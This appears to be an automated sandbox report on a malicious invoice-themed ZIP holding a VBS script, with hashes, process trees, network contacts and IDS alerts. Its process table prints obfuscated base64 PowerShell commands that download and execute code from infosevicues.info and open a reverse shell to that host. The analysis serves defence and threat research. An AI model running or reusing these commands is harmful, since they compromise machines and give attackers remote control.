File name: | __faktura_9875.zip |
Full analysis: | https://app.any.run/tasks/dc730fc6-c480-4cd8-b6e2-8e9d1c0769d4 |
Verdict: | Malicious activity |
Analysis date: | January 10, 2019, 14:32:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | CE206F063C8C2121491CC4B6F4C5E8B8 |
SHA1: | 86DEB3E3C8F99B59373E66DB2CE995AD5390BB84 |
SHA256: | 16B35906A78E2683FB2C05CFA54F2FBE6CFD936DBA1354DC6789D67719EADECE |
SSDEEP: | 12:50aeYO87awZJy4i17a9x6wMiMRSF41OrkhgLY1ZdsKzae7OcgaY:u3FxsJModMACzgLY3ii3Kc8 |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | __faktura_9875.vbs |
---|---|
ZipUncompressedSize: | 651 |
ZipCompressedSize: | 339 |
ZipCRC: | 0xf776349e |
ZipModifyDate: | 2019:01:10 05:46:29 |
ZipCompression: | Deflated |
ZipBitFlag: | - |
ZipRequiredVersion: | 788 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2936 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\__faktura_9875.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
2892 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\__faktura_9875.vbs" | C:\Windows\System32\WScript.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 | ||||
2440 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\Desktop\__faktura_9875.vbs" | C:\Windows\System32\WScript.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Version: 5.8.7600.16385 | ||||
3564 | "C:\Windows\System32\cmd.exe" /c po^w^ershell -E^nc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4012 | powershell -Enc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2348 | "C:\Windows\System32\cmd.exe" /c po^w^ershell -E^nc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1104 | powershell -Enc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
772 | "C:\Windows\System32\cmd.exe" /c po^w^ershell -E^nc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\cmd.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1440 | powershell -Enc "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AOgA0ADQAMwAvAGMAaABrAGUAcwBvAHMAbwBkAC8AZABvAHcAbgBzAC8AaQBaAGoAJwApADsA" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3856 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABSAEYAVgBVAHEANQAwADMAMAAwADgAPQBSAEYAVgBVAHEANQAwADMAMAAwADgAOwAgACAAIAAgAHcAaABpAGwAZQAgACgAJAB0AHIAdQBlACkAewAgACAAIAAgACAAIAAgACAAIAAgACAAdAByAHkAIAAgACAAIAB7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAUgBGAFYAVQBxADUAMAAzADAAMAA4AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAIgBpAG4AZgBvAHMAZQB2AGkAYwB1AGUAcwAuAGkAbgBmAG8AIgAsACAAOAAwACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEMAdgB1AHoANgA2ADYANgAxADUAPQAoACQAUgBGAFYAVQBxADUAMAAzADAAMAA4AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJABoAGQAcABPAE4AVQA1ADYANgAzAD0AMAAuAC4ANQAwADAAfAAlACAAewAwAH0AOwAgAAkACQAgACAAIAB3AGgAaQBsAGUAKAAoACQAWQByAFIAYQBjADAAMQA4ADUAMgA9ACQAQwB2AHUAegA2ADYANgA2ADEANQAuAFIAZQBhAGQAKAAkAGgAZABwAE8ATgBVADUANgA2ADMALAAwACwAJABoAGQAcABPAE4AVQA1ADYANgAzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewAgAAkACQAgACAAIAAgACQARgBiAHgAVgAzADQANQA2AD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABoAGQAcABPAE4AVQA1ADYANgAzACwAMAAsACQAWQByAFIAYQBjADAAMQA4ADUAMgApADsAJAB0AFcARAB5AHAAUQA4ADAAMwAxAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACgAaQBlAHgAIAAkAEYAYgB4AFYAMwA0ADUANgAgADIAPgAmADEAKQApADsAJABDAHYAdQB6ADYANgA2ADYAMQA1AC4AVwByAGkAdABlACgAJAB0AFcARAB5AHAAUQA4ADAAMwAxACwAMAAsACQAdABXAEQAeQBwAFEAOAAwADMAMQAuAEwAZQBuAGcAdABoACkAOwAkAEMAdgB1AHoANgA2ADYANgAxADUALgBGAGwAdQBzAGgAKAApACAACQAJAAkAfQAgAAkACQAgAH0AIAAgACAAIABjAGEAdABjAGgAIAAgACAAIAAgAHsAIAAgAAkAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AcwAgADEANQA7ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAKAAkAFIARgBWAFUAcQA1ADAAMwAwADAAOAAuAEMAbwBuAG4AZQBjAHQAZQBkACkAewAJACAACQAgACAAIAAgACAAIAAgACAAIAAgACAAJABSAEYAVgBVAHEANQAwADMAMAAwADgALgBDAGwAbwBzAGUAKAApADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAJAAkACQAgACAAIAAJAAkAfQAgACAAIAAgACAAIAAgAH0A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2936 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2936.26247\__faktura_9875.vbs | — | |
MD5:— | SHA256:— | |||
4012 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OLNRTVW02882HJN3F5QC.temp | — | |
MD5:— | SHA256:— | |||
1104 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GBCGBO981QTRV0O8M8F7.temp | — | |
MD5:— | SHA256:— | |||
1440 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JH3DTHK80ESDDTRN1Z8I.temp | — | |
MD5:— | SHA256:— | |||
3856 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N8UTB5F8KMUKI6FJ3JF4.temp | — | |
MD5:— | SHA256:— | |||
2732 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B08OZ32K3EE2XK7XD6K0.temp | — | |
MD5:— | SHA256:— | |||
3004 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PR7ICYH6KG83DW4MA3M1.temp | — | |
MD5:— | SHA256:— | |||
2732 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF264685.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3004 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
1440 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2640c9.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2892 | WScript.exe | 185.158.251.30:443 | serviceussupport.info | 23media GmbH | NL | unknown |
2440 | WScript.exe | 185.158.251.30:443 | serviceussupport.info | 23media GmbH | NL | unknown |
2732 | powershell.exe | 194.32.78.61:80 | infosevicues.info | — | — | suspicious |
1440 | powershell.exe | 194.32.78.61:443 | infosevicues.info | — | — | suspicious |
3856 | powershell.exe | 194.32.78.61:80 | infosevicues.info | — | — | suspicious |
4012 | powershell.exe | 194.32.78.61:443 | infosevicues.info | — | — | suspicious |
1104 | powershell.exe | 194.32.78.61:443 | infosevicues.info | — | — | suspicious |
3004 | powershell.exe | 194.32.78.61:80 | infosevicues.info | — | — | suspicious |
Domain | IP | Reputation |
---|---|---|
serviceussupport.info |
| unknown |
infosevicues.info |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3004 | powershell.exe | Potentially Bad Traffic | SUSPICIOUS [PTsecurity] SysInfo Exfiltration |
3004 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] System Enumeration via PowerShell |